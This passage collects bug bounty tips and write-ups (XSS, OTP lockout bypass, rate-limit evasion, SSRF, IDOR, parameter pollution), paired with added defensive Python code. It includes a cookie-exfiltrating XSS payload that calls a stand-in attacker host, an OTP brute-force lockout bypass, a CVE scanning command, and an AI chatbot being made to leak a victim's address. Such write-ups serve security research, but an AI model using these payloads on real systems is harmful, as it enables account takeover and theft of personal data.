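    body = json.loads(body_json)
    unexpected = sorted(set(body) - ALLOWED_SIGNUP_FIELDS)
    if audit is not None and unexpected:
        audit.extend(unexpected)
    return User(name=body["name"], email=body["email"],
                password_hash=hash_password(body["password"]))  # is_admin stays False


def signup_response(user, user_id):
    """The response shape quoted in the post; echoing isAdmin was the tell."""
    return {"success": True, "user_id": user_id, "name": user.name,
            "email": user.email, "isAdmin": user.is_admin}


# Constructed request with the same shape as step 6 of the post.
TAMPERED = ('{"name": "xxx", "email": "xxx@example.com", '
            '"password": "pass", "isAdmin": true}')

if __name__ == "__main__":
    print("vulnerable:", signup_response(register_vulnerable(TAMPERED), 123))
    log = []
    print("hardened:  ", signup_response(register_hardened(TAMPERED, audit=log), 124))
    print("unexpected keys seen:", log)
```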
🚀Bug Bounty Tips: Act quickly to report issues related to CVE-2020-27838, as many vulnerable instances are still out there. I've identified over 100+ instances vulnerable to CVE-2020-27838 so far. A flaw was found in Keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication.
Below is the PoC: https://yourtarget[.]com/auth/realms/master/clients-registrations/default/security-admin-console
Scan your targets using the following command and ethically report any quick wins: nuclei -l targets.txt -t CVE-2020-27838.yaml
Here's the link to the template - github.com/projectdiscovery/…
Enjoy! #CybersecurityTips #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounty #Tips
🌐Show & Tell: Here's how I bypassed account lockout limits on login with OTP, enabling me to take over any user's account. Here's yet another example of simple design issues that may exist but are most likely not being actively tested by researchers.
TLDR: In a target app supporting login only with a phone from one specific country, the requests were made with the country code extension in the request body. This immediately prompted me to tinker with the request to see if there was anything unusual about how this was being interpreted at the backend. It looks like I was able to change the country code in the request body to bypass the account lockout limit and still get logged in to the same account.
Here's how I approached this issue:
1️⃣ Navigated to the target app and entered a phone number to log in. An OTP was sent to the phone.
2️⃣ Intercepted the request and noticed two request body parameters: Phone and CountryCode.
3️⃣ Changed the "CountryCode" from +971 to +1, kept the same phone number, and entered the correct "OTP," and it logged me into my account with the +971 country code.
4️⃣ This seemed a bit unusual, as it demonstrated that something was wrong since the country code was not being factored in or was being stripped off while actually logging someone into an account. But it sort of made sense because the app supported only one country's phone numbers. But then why add the country code to the request if it's not being used at all?
5️⃣ Came up with some creative ideas and said to myself, "Let's try brute-forcing the 4-digit OTP." Looks like the limit was set to 5 attempts, after which the account would get locked out.
6️⃣ Came up with another wild imagination: What if the country code was somehow incorrectly being used here to determine what identifier to lock out?
7️⃣ Figured out that I could change the country code to +971, +1, +91, etc., while keeping the same phone number and brute force the OTP, and it never locked my account. This is possibly because there was a design flaw where they were checking for multiple failed attempts with both +[country code][phone#], something like that, while the country code was stripped off for actually validating the OTP with the phone number and during login, as we learned earlier.
End result? This allowed me to circumvent the account lockout limits and take over any user's account by guessing the 4-digit OTP.
Takeaways: It's important to keep an eye out for anything that stands out as unusual on your target app. For me, it was the fact that only one country's phone numbers were supported. Then why were they using country codes in the request? Sometimes asking these questions to yourself can lead to unrealistic discoveries that may pay off. #CyberSecurity #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounties #InfoSec 🛡️💻
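The lockout flaw above, as an added example that is not the author's code: a constructed OTP login where, as in the post, the backend strips the country code before validating the OTP but counts failures per (country code + phone) as submitted, beside a version that keys the lockout on the same identifier the OTP check uses. The phone number, OTP and five-attempt limit are constructed values; rotating through more country codes buys the vulnerable version proportionally more guesses.

```python
class OtpLogin:
    """Constructed model of the phone + OTP login described in the post."""

    MAX_FAILURES = 5

    def __init__(self, otp_by_phone, lockout_key):
        self._otp = otp_by_phone          # national number -> current OTP
        self._failures = {}               # lockout key -> failed attempts
        self._lockout_key = lockout_key   # how failures are grouped

    @staticmethod
    def key_vulnerable(country_code, phone):
        # Failures counted per (country code, number) exactly as the client
        # submitted them, so each new code starts a fresh counter.
        return country_code + phone

    @staticmethod
    def key_hardened(country_code, phone):
        # Failures counted on the identifier the OTP check actually uses.
        # In a real app both sides normalise to one canonical (E.164) form.
        return phone

    def attempt(self, country_code, phone, otp):
        key = self._lockout_key(country_code, phone)
        if self._failures.get(key, 0) >= self.MAX_FAILURES:
            return "locked"
        # As in the post, the country code is ignored for validation, so
        # +971, +1 and +91 with the same digits all hit the same account.
        if self._otp.get(phone) == otp:
            self._failures.pop(key, None)
            return "ok"
        self._failures[key] = self._failures.get(key, 0) + 1
        return "wrong"


PHONE, OTP = "501234567", "9999"          # constructed test account


def guesses_before_lockout(lockout_key, country_codes=("+971", "+1", "+91")):
    """How many OTP guesses an attacker rotating country codes gets in before
    the account locks. The real OTP is 9999 so no early guess succeeds."""
    login = OtpLogin({PHONE: OTP}, lockout_key)
    allowed = 0
    for n in range(10_000):
        # switch to the next country code each time a counter fills up
        cc = country_codes[(n // OtpLogin.MAX_FAILURES) % len(country_codes)]
        if login.attempt(cc, PHONE, f"{n:04d}") == "locked":
            break
        allowed += 1
    return allowed


def mismatched_code_still_logs_in(lockout_key):
    """Step 3 of the post: the correct OTP works under a different code."""
    return OtpLogin({PHONE: OTP}, lockout_key).attempt("+1", PHONE, OTP) == "ok"


if __name__ == "__main__":
    print("vulnerable keying allows", guesses_before_lockout(OtpLogin.key_vulnerable))
    print("hardened keying allows  ", guesses_before_lockout(OtpLogin.key_hardened))
```

Keying the lockout on the canonical account identifier closes this gap; a per-source rate limit on the OTP endpoint is the usual second layer so one client cannot make thousands of attempts regardless of how the request is shaped.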
I've often hesitated to participate in public bug bounty programs, mistakenly believing that if a program is public, it's likely already been thoroughly tested and is bug-free. However, I've been proven wrong. Over the past 2 years, I've learned valuable lessons that have humbled me. The key takeaways are: never assume, never hesitate, and never talk yourself out of taking action due to fear of failure. My manual submission rate has decreased from 10-15 critical bugs per month to just 2-3 criticals, yet the overall bounties are pretty much the same due to high paying programs. It's unreal how vulnerable some of the most common applications can be. My advice is to continually challenge yourself to improve. The journey can be tough, but there's always hope for success. There’s always a greater than 0% chance of something if you’re trying hard enough :) Most of us are on the same skill sets, with some performing better than others. The key difference lies in persistence and a never-give-up attitude. Invest as many hours as possible, and seize this opportunity to make your mark. Best of luck!
Bug Bounty Tips: Here's how you can escalate XSS Issues to an Account Takeover💸 Have you identified an XSS Issue? Don't be too quick to report it with alert(1) or alert(document.cookie) for a Medium payout. Here's how you can escalate XSS Issues to an ATO for much higher bounties:
1️⃣ Always try exfiltrating session-based cookies to your attacker-controlled server. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://attackersite(.)com?cookies=' + document.cookie + ''"> This payload exfiltrates user cookies and forwards them to an attacker-controlled site. Create a Proof of Concept (PoC) video showing how these cookies can hijack a user's session, e.g., send a request to any authenticated API and demonstrate that the cookies work.
2️⃣ If cookies are set as HttpOnly, try escalating the impact by performing sensitive client-side actions, such as changing a user's email address or password, leading to an account takeover.
3️⃣ If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these to your attacker-controlled server to get an account takeover.
4️⃣ If no session cookies or tokens are found on any pages, check the browser's local storage for stored session tokens and accordingly craft your XSS payload to exfiltrate these to your attacker-controlled server, leading to an account takeover.
🚀Lesson: Always look for ways to escalate XSS Issues to account takeovers, as this could potentially boost the bounty amount for that report by 2-10x! 💡 #BugBounty #InfoSec #xss #crosssitescripting #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips
Sharing my experience with @Netlas_io:🕵️‍♂️ I've integrated Netlas.io into my automation framework to retrieve asset IPs, subdomains, and associated domains. It has led me to discover numerous new assets, facilitating successful subdomain takeovers and identifying additional security issues along the way. Additionally, I've been using Netlas.io for identifying vulnerable services using keywords, titles, or favicon hashes, a strategy that has yielded significant success. Here's how you can leverage some of these services.
Scenario 1: If you've identified a service vulnerable to a specific issue and wish to identify other affected targets, Netlas.io allows you to search for similar targets using keywords found in the response body. For example, by searching for the keyword "hubspot" in the response body, you can uncover all targets sharing this characteristic. Example: https://app[.]netlas[.]io/responses/?q=http.body:(hubspot)&page=1&indices=
Scenario 2: In the event of a new 0-day exploit circulating, and you're in search of specific instances like Jenkins based on request headers, Netlas.io provides the means to quickly pinpoint such instances. Example: https://app[.]netlas[.]io/responses/?q=http.headers.x_jenkins:* OR http.headers.x_jenkins_cli2_port:* OR http.headers.x_jenkins_session:*&page=1
Scenario 3: Need to locate subdomains efficiently? You can use something like this. Example: https://app[.]netlas[.]io/domains/?indices=&page=1&q=domain%3A%28domain%3A%2A.paypal[.]com%29
Scenario 4: For broad investigations aimed at finding domains associated with a specific registrant org name, email, or nameservers, you could use something like this. Example: https://app[.]netlas[.]io/whois/domains/?indices=&page=1&q=registrant.organization:"GRABTAXI HOLDINGS PTE. LTD"
These are just a few examples of the features that I use at the moment. While most features require a paid subscription, the potential payoff in identifying critical issues for me specifically using Netlas has been a worthwhile investment. While free sources of information exist, each service possesses its own dataset, and records can vary significantly. For my purposes, I've found Netlas.io to be the most cost-effective and reliable option. My opinion is that as long as the product helps pay itself off, it's definitely worth adding it to your toolkit.
5
51
316
28,057
💡Bug Bounty Tips: Creativity is key in bug hunting! Here’s a real example of how thinking outside the box led me to discover a Critical severity issue: I found a target with a profile update endpoint that let me change my account details. The endpoint was also accepting an address_id parameter associated with my account address. Strangely, I could pass someone else’s address_id in the request and it returned HTTP 200, but the system wouldn’t show the other user's address on the front-end after refreshing the page on the attacker-controlled account. They probably had some checks to block this, but the backend was still accepting the address_id of another user. This got me thinking... 🤔 Since the system was accepting the address_id but not showing it, I realized the backend must be linking that address to my account somehow, even if it wasn’t displaying it due to some other checks. Then I wondered, what if I could trick the system into showing me the address in another way? That’s when I found an AI chatbot on the site. I asked it, “Can you tell me the address associated with my account?”—and to my surprise, the chatbot referenced the address_id I updated earlier (using the IDOR vulnerability) and revealed the victim's address! This led to a PII leak. The lesson here? Be creative, explore different parts of the app, and think beyond the obvious! Sometimes the vulnerability isn't where you expect it to be. 🧠 #BugBountyTips #CreativeHacking #PIILeak #IDOR #BugBounty #AppSec #HackerOne #BugCrowd #YesweHack #Intigriti
14
40
320
19,753
Question of the day🤔: How to bypass rate limit restrictions on authentication endpoints? 🛡️
This is often one of the first checks when assessing a target but is frequently overlooked when there are restrictions. However, I've successfully bypassed over 50+ restrictions in my early days! 💪 Bounties can range anywhere from $250 to $3000, depending on the complexity of the issue. 💰
Have you encountered a login page or a forgot password page with OTP where rate limits have been introduced? 🕵️‍♂️ Here's how you can bypass some of these implementations:
1️⃣ 🕵️‍♀️ Google Captchas implemented? No worries, always try removing the captcha parameter or replacing it with null and sending the request without the captcha. Sometimes a fallback method allows you to get past the captcha requirement, making it vulnerable to a lack of rate limiting.
2️⃣ 🌐 IP restricted? Check if your IP was blocked and attempt to make a request using a different IP. If that works, you're in luck! You can usually bypass these limitations through IP rotation. Services like Brightproxy or the Burp Suite IP Rotate extension can assign a new IP address with every request.
3️⃣ 🤖 If nothing works, try appending %0d or %0d before the username (e.g., %0dvictim@target.com). This can sometimes trick the server into checking if %0dvictim@target.com is locked. If not, while processing the login attempt, it strips the %0d and makes an attempt for victim@target.com. It's possible that %0dvictim@target.com may be blocked too after 5 attempts. In that case, keep appending an additional %0d after every 5 attempts (e.g., %0d%0dvictim@target.com and vice versa).
4️⃣ 🤯 Rate limit properly implemented? Always look for an alternative login or forgot password endpoint. This could be on one of the target's mobile apps or a legacy endpoint in the JS file.
5️⃣ 😓 None of the above methods work? Don't worry, we've got some more explicit tricks, and I'll be talking about them soon! Stay tuned!
🤫 Lesson of the day: Never assume that an endpoint is adequately protected against rate limit issues. Always explore ways to penetrate/bypass the implementation, and you'll be surprised at the results and win some nice bounties! 💎💰
#SecurityTips #BugBounty #HackerOne #BugCrowd #InfoSec #BugBountyTips 🔒🔍🔓🦠🕶️
11
52
316
26,617
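Added example (not from this thread): the server-side counterpart to items 2 and 3 above. A login rate limiter that canonicalizes the submitted username (percent-decoding, stripping control characters such as the %0d carriage return, case-folding) before using it as a key, and that budgets on the account as well as the source IP, gives the prefixed spellings and rotated IPs one shared budget with the plain username. Thresholds and the sample identifiers are constructed.

```python
# Added example (not from the original thread): a login rate limiter that keys
# on a canonicalized account identifier as well as the source IP, so that the
# %0d-prefix and IP-rotation tricks described above share one budget with the
# plain username. Thresholds and the sample identifiers are constructed.
import re
import time
import unicodedata
from collections import defaultdict, deque
from urllib.parse import unquote

MAX_FAILURES = 5          # failed attempts allowed per key within the window
WINDOW_SECONDS = 300      # sliding window (constructed values)

_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def normalize_identifier(raw: str) -> str:
    """Canonicalize a submitted username before it becomes a rate-limit key.

    Percent-decodes (%0d -> CR), strips control characters and surrounding
    whitespace, applies NFKC folding and lower-cases, so every spelling of the
    same account lands in the same bucket.
    """
    decoded = unquote(raw)
    cleaned = _CONTROL_CHARS.sub("", decoded)
    return unicodedata.normalize("NFKC", cleaned).strip().lower()


class LoginRateLimiter:
    """Sliding-window limiter over two keys: the normalized account and the client IP."""

    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures

    def _keys(self, username, client_ip):
        return ("user:" + normalize_identifier(username), "ip:" + client_ip)

    def _recent(self, key, now):
        bucket = self._failures[key]
        while bucket and now - bucket[0] > self.window:
            bucket.popleft()
        return bucket

    def allow(self, username: str, client_ip: str) -> bool:
        """Deny when either the account or the IP has exhausted its budget."""
        now = self.clock()
        return all(len(self._recent(k, now)) < self.max_failures
                   for k in self._keys(username, client_ip))

    def record_failure(self, username: str, client_ip: str) -> None:
        now = self.clock()
        for key in self._keys(username, client_ip):
            self._failures[key].append(now)


def demo_prefix_and_ip_rotation() -> bool:
    """Five failures spread over %0d-prefixed spellings and rotating IPs still
    lock the plain username; returns whether a sixth attempt is allowed."""
    limiter = LoginRateLimiter()
    for i in range(MAX_FAILURES):
        spelling = "%0d" * (i % 3) + "Victim@Target.com"   # constructed sample identifier
        assert limiter.allow(spelling, f"10.0.0.{i}")
        limiter.record_failure(spelling, f"10.0.0.{i}")
    return limiter.allow("victim@target.com", "10.0.0.99")


if __name__ == "__main__":
    print("sixth attempt allowed:", demo_prefix_and_ip_rotation())
```

The account-keyed budget is what closes the gap: an IP-only limiter is exactly what item 2 describes rotating around, and an un-normalized username key is what item 3 exploits. Per-account limits must also be paired with a generic failure response so that the limiter itself does not become an account-enumeration oracle.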
Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️‍♂️💻 1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.
18
64
314
31,777
🚀 Unspoken Bug Bounty Rules – From many years of failures & experience! 🕵️‍♂️
Got a similar bug across multiple assets but fear the program might count them as one for payout despite requiring multiple fixes?
✅ Report one at a time. Wait for a bounty. Then submit the next one.
⚖️ Think your report is High/Critical but doesn’t align with CVSS?
✅ Focus on demonstrating impact. Reference previous reports, screenshots of policies, and clarify why severity should be higher.
🔗 Reporting a subdomain takeover but worried it'll be fixed before triage?
✅ Archive it via the Wayback Machine for solid evidence. If they still reject it, at least you'll have evidence and can fight back and, most importantly, won’t have to walk away with a Not Applicable (NA).
🔢 Reporting an IDOR on UUIDs but getting a "Low" payout due to high complexity?
✅ Show how multiple UUIDs can be discovered via web archives, dorks, and OSINT. If IDs are easily accessible, it strengthens your case.
💨 Reporting a Cache Poisoning DoS, but DoS is out of scope?
✅ Never call it DoS! Instead, frame it as Cache Poisoning to Arbitrary Content Injection and clearly explain your attack scenario.
🔒 Working on a program that has both a VDP & BBP?
✅ Submit to the VDP initially, but if you prove your skills, politely request an invite to their private BBP via comments.
🤝 Love hunting on a program? Want to do more with them?
✅ Build relationships with program managers & triagers. Being polite and engaging on special occasions never hurts.
📢 Disagree with CVSS or impact assessment?
✅ Instead of frustrated follow-ups, provide detailed reasoning & impact proofs. A well-structured response is likely to get better attention from H1 triage and program managers.
🚪 Not happy with how a program treats you despite your contributions?
✅ There are 1000+ programs out there. Take a break and revisit later—management changes, and things improve!
💡 I'm sure there are more such unspoken bug bounty insights. These are just a few that I've learned the hard way. Hope it helps! Please feel free to add :)
9
62
304
17,183
🤔 Question of the Day: How to approach restricted bug bounty programs with a single site in scope?
Many ask me, "How do you discover issues on bug bounty programs with only one target site in scope? What sets you apart?" While most shy away from such targets, I employ a few extra strategies that help me uncover more issues. Here are the top 5 approaches I use on these targets:
1️⃣ Check for Mobile Apps: Even if the mobile app isn't in scope, it's worth inspecting. I've found many programs with Android apps not explicitly listed in scope, yet they call the same in-scope APIs or target sites. This reveals overlooked endpoints, leading to more reported security issues.
2️⃣ Subdomain Takeovers: Unless explicitly excluded, programs often accept these issues, even when they've specified only the root domain as in-scope.
3️⃣ Analyze JavaScript Files: Install and analyze all JS files, including archived ones. The goal is to identify as many endpoints as possible, including legacy ones that may still be active, presenting numerous opportunities to find security issues.
4️⃣ Mobile App API Endpoints: Install all versions of mobile apps and extract endpoints from the Java source code. This reveals endpoints used across various releases, uncovering many testable endpoints and potential security bugs.
5️⃣ Explore Premium Features: Consider obtaining a paid account on these services. Free trial schemes or money-back guarantee packages are often available. Treat it as a $50 investment to explore premium features. You'll be amazed at the possibilities a paid account can open up for finding bugs.
Takeaways: Don't give up on restricted targets; there's more beneath the surface. Think creatively, and explore areas others might overlook. You'll be surprised by the results! 🚀💡
#BugBounty #Cybersecurity #HackerTips #InfoSec #BugBountyTips #SecurityTips #InfoSec
14
43
287
33,722
🔒 Question of the day: What are the common vulnerabilities in Shopify stores?
It's common to assume that Shopify stores are safe targets, but over the years, I've encountered various misconfigurations that can lead to bounties ranging from $250 to $5000 💰. Here are some common issues you might find on a third-party site using a Shopify store:
1️⃣🔑 Multipass Login: In some cases, Shopify stores are configured to allow you to log in using the target app's Single Sign-On (SSO) system. If the primary app doesn't require email verification during account creation, you might be in luck. Here's how it works: Imagine someone has placed an order with a "Guest" checkout, using an email like victim@example(.)com. If the attacker can create an account using victim@example(.)com and log in without email verification, they gain access to the other user's orders. This could lead to a significant Personally Identifiable Information (PII) disclosure issue. Always be vigilant for this potential vulnerability!
2️⃣⚠️ XSS Vulnerabilities: Shopify has over 8000+ third-party plugins/themes, which can be vulnerable to XSS issues. Don't assume it's safe just because it's Shopify. Depending on the third-party integrations, you might encounter XSS vulnerabilities. Be thorough in testing all parameters for XSS, particularly DOM and postMessage issues.
3️⃣📦 Custom Apps: Some Shopify stores use in-house apps or custom APIs that may leak sensitive information about store orders. Investigate all functionalities used by the app, and you may discover misconfigurations or IDOR issues that could earn you bounties.
🏹 Lesson learned: Don't overlook Shopify store targets simply because they're on Shopify. Many integrations can introduce vulnerabilities, making Shopify stores ripe for finding bounties. 🕵️‍♂️🛡️
#hackerone #bugbountytips #securitytips #cybersecurity #infosec #bugcrowd #follow 🌐
22
51
294
35,756
Retweeting as previous post got shadow banned.
Bug Bounty Tips: Here's how you can escalate XSS issues to ATO💸
Have you identified an XSS issue? Don't be too quick to report it with alert(1) or alert(document.cookie) for a Medium payout. Here's how you can escalate XSS issues to an ATO for much higher bounties:
1️⃣ Always try exfiltrating session-based cookies to your controlled server. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://yoursitesite(.)com?cookies=' + document.cookie + ''"> This payload exfiltrates user cookies and forwards them to your site. Create a Proof of Concept (PoC) video showing how these cookies can be used to take over a user's session, e.g. send a request to any authenticated API and demonstrate that the cookies work.
2️⃣ If cookies are set as HttpOnly, try escalating the impact by performing sensitive client-side actions, such as changing a user's email address or password, leading to ATO.
3️⃣ If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these to your controlled server to get an ATO.
4️⃣ If no session cookies or tokens are found on any pages, check the browser's local storage for stored session tokens and accordingly craft your XSS payload to exfiltrate these to your server, leading to an ATO.
🚀Lesson: Always look for ways to escalate XSS issues to ATO, as this could potentially boost the bounty amount for that report by 2-10x! 💡
#BugBounty #InfoSec #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips
9
97
340
20,990
Found an interesting bug a while back and thought I’d share it here 👇 I came across an unused API endpoint inside a JavaScript file - `/api/users/<user_id>/activities/`. It wasn’t being called anywhere within the app, so naturally, I tried to hit it manually using my JWT from the web app. The result? 403 Forbidden. No access. Later that day, I downloaded the mobile app for the same target just to poke around for some other issues. While logging in, I noticed something odd - the JWT generated by the mobile app was noticeably bigger than the one from the web. As a next step I threw it into jwt[.]io for a quick look and to my surprise the token had way more scopes and permissions granted compared to the web version, even though it was for the same account. At this point I had a wild theory which I was pretty sure wouldn't work... But as you can imagine, I went back to that `/api/users/<user_id>/activities/` endpoint, but this time used the mobile-generated JWT... and boom, it worked. I had full access to PII data for other users. The endpoint was probably gated by permissions that only mobile clients were issuing. Moral of the story? Don’t just test with the web client. Always compare JWTs from different platforms - web, mobile, maybe even desktop. Misconfigured scopes or overly permissive mobile tokens can open up unimaginable possibilities.
9
44
298
16,156
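Added example (not from the original post): the jwt.io comparison above done in code, plus the issuance fix. Two constructed HS256 tokens for the same account model the web/mobile mismatch; scope_diff verifies both signatures and lists what the mobile token has extra, and issue_token shows scopes being clamped to one per-user entitlement so the client type can never widen access. The secret, subjects, scope names and the USER_SCOPES policy are all constructed assumptions.

```python
# Added example (not from the original post): mint and verify HS256 JWTs with the
# standard library, diff the scopes two clients received for the same account,
# and issue tokens from one per-user policy so the client type cannot widen
# access. The secret, claims and scope names are constructed for the demo.
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"   # constructed; a real key lives in a KMS/config store

# Assumed per-user policy: the scopes this account is entitled to, on any client.
USER_SCOPES = {"user-42": {"profile:read", "orders:read", "activities:read"}}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes = SECRET) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, secret: bytes = SECRET) -> dict:
    """Check the signature before trusting any claim; reject anything but HS256."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(body_b64))


def scope_diff(token_a: str, token_b: str) -> list:
    """Scopes granted in token_b but absent from token_a, for the same subject.
    This is the comparison the post describes doing by eye on jwt.io."""
    a, b = verify_hs256(token_a), verify_hs256(token_b)
    if a["sub"] != b["sub"]:
        raise ValueError("tokens belong to different subjects")
    return sorted(set(b["scope"].split()) - set(a["scope"].split()))


def issue_token(sub: str, client: str, requested: set) -> str:
    """Clamp requested scopes to the user's entitlement; 'client' is recorded
    for telemetry only and never changes what is granted."""
    granted = requested & USER_SCOPES.get(sub, set())
    return sign_hs256({"sub": sub, "client": client, "scope": " ".join(sorted(granted))})


def can_read_activities(token: str, target_user: str) -> bool:
    """Endpoint guard: reading another user's activities needs activities:read:any,
    which issue_token never grants to an ordinary user on any client."""
    claims = verify_hs256(token)
    scopes = set(claims["scope"].split())
    if claims["sub"] == target_user:
        return "activities:read" in scopes
    return "activities:read:any" in scopes


# Constructed tokens modelling the mismatch in the post: same account, wider mobile scope.
WEB_TOKEN = sign_hs256({"sub": "user-42", "client": "web", "scope": "profile:read orders:read"})
MOBILE_TOKEN = sign_hs256({"sub": "user-42", "client": "mobile",
                           "scope": "profile:read orders:read activities:read:any"})

if __name__ == "__main__":
    print("extra mobile scopes:", scope_diff(WEB_TOKEN, MOBILE_TOKEN))
```

The endpoint in the post was not wrong to honour the scope it saw; the defect was upstream, where the mobile login path handed out a scope the user was never entitled to. Diffing tokens per client in CI, as scope_diff does, catches that drift before it reaches production.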
🌐Bug Bounty Tips: Working on a wide-scope target? Here's how you can discover all related assets! 🕵️‍♂️
Working on a comprehensive bug bounty program? Here are my top 5 strategies to identify all related assets:
1️⃣ IP Ranges: Discover IP ranges using the target's ASN. Visit bgp.he.net/AS33848#_prefixes for a comprehensive list.
2️⃣ Favicon Hash: Use tools like favicon-hash.kmsec.uk/ to obtain the favicon hash of your target site. Find similar sites using the hash with a Shodan search, e.g., shodan.io/search/report?quer…
3️⃣ DNS Records: Leverage tools like securitytrails.com to uncover DNS records. Search for domains pointing to the same name servers or MX records.
4️⃣ Associated Domains: Explore domains associated with your target based on factors like registrant orgs and addresses.
5️⃣ Acquisitions: Check for acquisitions via crunchbase.com/ and gather all related domains. Apply steps 1 to 5 to these as well.
Feel free to share your ideas in the comments! 🚀
#BugBounty #Cybersecurity #BugHunting #BugBountyTips #SecurityTips #InfoSec #HackerOne #BugCrowd
8
74
276
28,081
Although this is a known technique, I wanted to share it as I’ve recently encountered several Lambda-based SSRFs where I could exfiltrate environment variables and headers containing sensitive secrets and critical infrastructure data. Do you have an HTTP pingback or control over a URL parameter that returns a response based on the passed URL, but you’re unsure where to go next? You can easily verify if your SSRF is on a Lambda instance by hitting: localhost:9001/2018-06-01/runtime/invocation/next. Additionally, the Lambda function may have whitelisted internal IP ranges, allowing you to expand your attack surface by enumerating internal services and endpoints. I’ll share more on this in an upcoming tweet. #BugBountyTips #SSRF #AWS #Security #Recon #BugCrowd #HackerOne
8
33
265
15,703
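Added example (not from the original post): the validation a server-side fetcher should apply to a caller-supplied URL before following it, which is the control that stops the localhost runtime-API and metadata probes described above. The allow-list and the resolver answers are constructed; the resolver is injected so the check runs offline and so the caller can connect to exactly the addresses it vetted rather than re-resolving.

```python
# Added example (not from the original post): validate an outbound URL before a
# server-side fetch, as a defence against the Lambda runtime-API and metadata
# probes described above. The allow-list and the resolver answers are constructed;
# `resolve` is injected so the example runs offline and so the caller can pin the
# connection to the addresses it checked.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}
ALLOWED_HOSTS = {"api.partner.example"}           # constructed allow-list
BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal"}


def is_forbidden_address(ip) -> bool:
    """True for loopback, link-local (169.254.169.254 lives here), private,
    reserved, multicast and unspecified addresses, including IPv4-mapped IPv6."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_outbound_url(url: str, resolve):
    """Return (ok, reason). `resolve(host)` returns the list of IP strings the
    fetcher will connect to; every one of them must be a public address."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "missing host"
    if host in BLOCKED_HOSTNAMES:
        return False, "blocked hostname"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass
    else:
        return False, "literal IP addresses not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    for addr in resolve(host):
        if is_forbidden_address(ipaddress.ip_address(addr)):
            return False, f"resolves to forbidden address {addr}"
    return True, "ok"


# Constructed resolver standing in for DNS (the answer is a sample, not a real mapping).
FAKE_DNS = {
    "api.partner.example": ["1.1.1.1"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("https://api.partner.example/v1/export",
              "http://localhost:9001/2018-06-01/runtime/invocation/next",
              "http://169.254.169.254/latest/meta-data/"):
        print(u, "->", validate_outbound_url(u, fake_resolve))
```

The resolved-address check matters even with an allow-list: an allow-listed name that later resolves to a link-local or private address (DNS rebinding, or a compromised zone) is rejected by the same rule that rejects a literal. Pair this with an HTTP client that does not follow redirects automatically, since a redirect is another way to reach a forbidden destination after validation.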
💥 Simple HTTP Parameter Pollution escalated to PII Leak → 4-Digit Bounty!
✅ {"proxyPayload":"Limit=20&userID=<attacker_ID>"} → 200 OK
❌ {"proxyPayload":"Limit=20&userID=<victim_ID>"} → "errorMessage":"Forbidden Access"
✅ {"proxyPayload":"userID=<victim_ID>&Limit=20&userID=<attacker_ID>"} → 200 OK
Here’s what happened:
🔹 The first server validated the second userID in the request for access control.
🔹 The secondary system (context) used the first userID to retrieve PII belonging to the victim.
This mismatch allowed me to validate my attacker userID while accessing the victim’s data.
End result? Access control bypass → Mass PII Leak 🚨
Lesson: Test how APIs handle duplicate parameters, especially in secondary contexts where different parts of the system may interpret them inconsistently.
#BugBountyTips #Hacking #HTTP #BugCrowd #HackerOne #Intigriti #YesWeHack
6
38
262
15,071
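Added example (not from the original post): the two parameter-selection behaviours above side by side, and the fix. vulnerable_lookup models a gateway that authorizes on the last userID while the backend fetches on the first; hardened_lookup parses once, rejects any repeated key outright, and uses the single parsed value for both the authorization decision and the fetch. The record store, IDs and query strings are constructed.

```python
# Added example (not from the original post): how an API layer should treat
# duplicate query parameters. first_value/last_value model the two components
# that disagreed in the post; parse_strict rejects the request instead. The
# record store and IDs are constructed.
from urllib.parse import parse_qsl


class DuplicateParameterError(ValueError):
    """Raised when a query string repeats a key."""


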